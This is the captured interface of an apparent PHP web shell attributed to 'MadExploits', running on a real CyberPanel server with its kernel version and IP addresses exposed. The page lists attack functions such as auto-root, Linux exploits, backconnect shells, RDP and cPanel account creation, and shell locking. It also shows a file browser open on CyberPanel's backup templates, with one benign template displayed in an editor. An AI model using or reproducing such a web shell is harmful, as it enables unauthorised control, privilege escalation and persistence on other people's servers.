Linux cyberpanel 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
LiteSpeed
: 160.191.175.3 | : 216.73.216.114
Cant Read [ /etc/named.conf ]
8.2.29
aodai6801
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
CyberCP /
backup /
templates /
backup /
[ HOME SHELL ]
Name
Size
Permission
Action
OneClickBackupSchedule.html
24.23
KB
-rw-r--r--
backup.html
20.81
KB
-rw-r--r--
backupDestinations.html
25.4
KB
-rw-r--r--
backupLogs.html
5.41
KB
-rw-r--r--
backupSchedule.html
24.69
KB
-rw-r--r--
googleDrive.html
23.32
KB
-rw-r--r--
index.html
4.61
KB
-rw-r--r--
oneClickBackups.html
33.94
KB
-rw-r--r--
remoteBackups.html
21.69
KB
-rw-r--r--
restore.html
13.92
KB
-rw-r--r--
restoreOCBackups.html
13.84
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.html
{% extends "baseTemplate/index.html" %} {% load i18n %} {% block title %}{% trans "Backup Home - CyberPanel" %}{% endblock %} {% block content %} {% load static %} {% get_current_language as LANGUAGE_CODE %} <!-- Current language: {{ LANGUAGE_CODE }} --> <div class="container"> <div id="page-title"> <h2>{% trans "Backup" %}</h2> <p>{% trans "Backup and restore sites." %}</p> </div> <div class="panel col-md-11"> <div class="panel-body"> <h3 class="content-box-header"> {% trans "Available Functions" %} </h3> <div class="example-box-wrapper"> <div class="row"> {% if createBackup or admin %} <div class="col-md-3 btn-min-width"> <a href="{% url 'backupSite' %}" title="{% trans 'Backup Site' %}" class="tile-box tile-box-shortcut btn-primary"> <div class="tile-header"> {% trans "Backup" %} </div> <div class="tile-content-wrapper"> <i class="fa fa-clone"></i> </div> </a> </div> {% endif %} {% if restoreBackup or admin %} <div class="col-md-3 btn-min-width"> <a href="{% url 'restoreSite' %}" title="{% trans 'Restore Backup' %}" class="tile-box tile-box-shortcut btn-primary"> <div class="tile-header"> {% trans "Restore" %} </div> <div class="tile-content-wrapper"> <i class="fa fa-undo"></i> </div> </a> </div> {% endif %} {% if addDeleteDestinations or admin %} <div class="col-md-3 btn-min-width"> <a href="{% url 'backupDestinations' %}" title="{% trans 'Add/Delete Destinations' %}" class="tile-box tile-box-shortcut btn-primary"> <div class="tile-header"> {% trans "Add/Delete Destinations" %} </div> <div class="tile-content-wrapper"> <i class="fa fa-map-pin"></i> </div> </a> </div> {% endif %} {% if scheduleBackups or admin %} <div class="col-md-3 btn-min-width"> <a href="{% url 'scheduleBackup' %}" title="{% trans 'Schedule Backup' %}" class="tile-box tile-box-shortcut btn-primary"> <div class="tile-header"> {% trans "Schedule Backup" %} </div> <div class="tile-content-wrapper"> <i class="fa fa-refresh"></i> </div> </a> </div> {% endif %} {% if remoteBackups or admin %} <div class="col-md-3 btn-min-width"> <a href="{% url 'remoteBackups' %}" title="{% trans 'Remote Backups' %}" class="tile-box tile-box-shortcut btn-primary"> <div class="tile-header"> {% trans "Remote Backups" %} </div> <div class="tile-content-wrapper"> <i class="fa fa-cloud-upload"></i> </div> </a> </div> {% endif %} </div> </div> </div> </div> </div> {% endblock %}
Close